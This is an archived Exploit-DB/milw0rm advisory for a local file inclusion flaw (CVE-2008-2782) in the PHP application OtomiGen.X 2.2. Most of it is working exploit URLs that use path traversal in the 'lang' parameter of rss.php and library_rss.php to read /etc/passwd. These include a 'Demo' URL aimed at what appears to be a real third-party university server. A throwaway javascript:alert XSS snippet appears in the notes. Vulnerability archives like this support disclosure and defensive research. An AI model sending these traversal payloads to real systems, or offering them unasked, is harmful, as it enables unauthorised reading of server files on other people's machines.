OtomiGen.X 2.2 lang Local File Inclusion Vulnerabilities

2008-05-27T00:00:00
ID EDB-ID:5680
Type exploitdb
Reporter Saime
Modified 2008-05-27T00:00:00

Description

OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities. CVE-2008-2782. Webapps exploit for php platform

                                        
                                            [+] Author: Saime
[+] Script: OtomigenX v2.2 (lang) Local File Inclusion
[+] URL: http://kmrg.itb.ac.id/otomigenx/?menu=download
[+] Date: 28/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!
[+] Site: http://h4ck-y0u.org

[+] File: library_rss.php/rss.php
[+] Exploit:
http://localhost/otomigenx/rss.php?lang=../../etc/passwd
http://localhost/otomigenx/library_rss.php?lang=../../etc/passwd
[+] Demo:
http://kmrg.itb.ac.id/otomigenx/library_rss.php?lang=../../../../../etc/passwd
[+] Notes: Don, hows the threaded version going? lololol ( javascript:alert('noob'); ) or should it be plain xss? LOLOL

# milw0rm.com [2008-05-27]